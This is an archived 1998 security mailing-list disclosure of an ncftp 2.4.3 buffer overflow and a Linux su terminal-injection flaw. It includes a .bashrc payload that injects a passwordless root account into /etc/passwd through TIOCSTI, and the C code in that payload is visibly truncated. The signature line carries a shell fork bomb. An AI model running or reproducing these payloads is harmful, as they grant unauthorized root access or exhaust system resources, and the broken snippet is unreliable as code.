ncftp 2.4.3 overflow / su killing

From: Michal Zalewski (lcamtufat_private)
Date: Tue Mar 24 1998 - 08:18:53 PST

  • Next message: Ondrej Suchy: "apache+ssl 1.13 symlink problem"

    [I posted it already four days ago, but nothing happend]
    There is a possible buffer overflow in new version of ncftp (2.4.3,
    released few days ago) - it uses 512-bytes long buffer to store local
    working directory (sigh!). You may exploit it creating eg. /TEST directory
    on ftp server with subdirectory eg. xxx(200)xxx/yyy(200)yyy/zzz(200)zzz.
    It's sufficient to crash ncftp when directory is being retreived using
    'get -R /TEST'.
    Oh, as an addendum... There's a problem with Linux su command, as I
    described few posts ago (I thought it's ncurses' fault, but I was wrong).
    ** Big thanks to Nergal for example how to pass anything to shell if we're
    already controlling terminal input (TIOCSTI). **
    If non-root account will be compromised, eg. with lynx/ncftp bug, and
    .bashrc on this non-root account will be altered to something like that:
    cat >/tmp/a.c <<X
    #include <sys/ioctl.h>
    main(){char C[]="\necho 'nergal::0:0::/:/bin/sh'>>/etc/passwd;logout\n";int i=0,
    gcc /tmp/a.c -o/tmp/a;/tmp/a;rm -f /tmp/a ~/.bashrc;clear
    During next su session, "echo '...' >>/etc/passwd" will be executed at
    root account [hopefully] :)
    In general, problem lies in ability to killing su itself by unprivledged
    process - it will still be able to control terminal i/o, because su, when
    killed with SIGKILL, performs no any tty hangup/reset. So we may parse
    anything to privledged shell, or do anything else with terminal. So
    there are 3 bugs: unprivledged process may kill 'su'; 'su' doesn't
    perform any tty checks; bash also is careless ;)
    Fix: replace Linux su with smarter one ;)
    Michal Zalewski [lcamtufat_private] <= finger for pub PGP key
    Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
    [echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]

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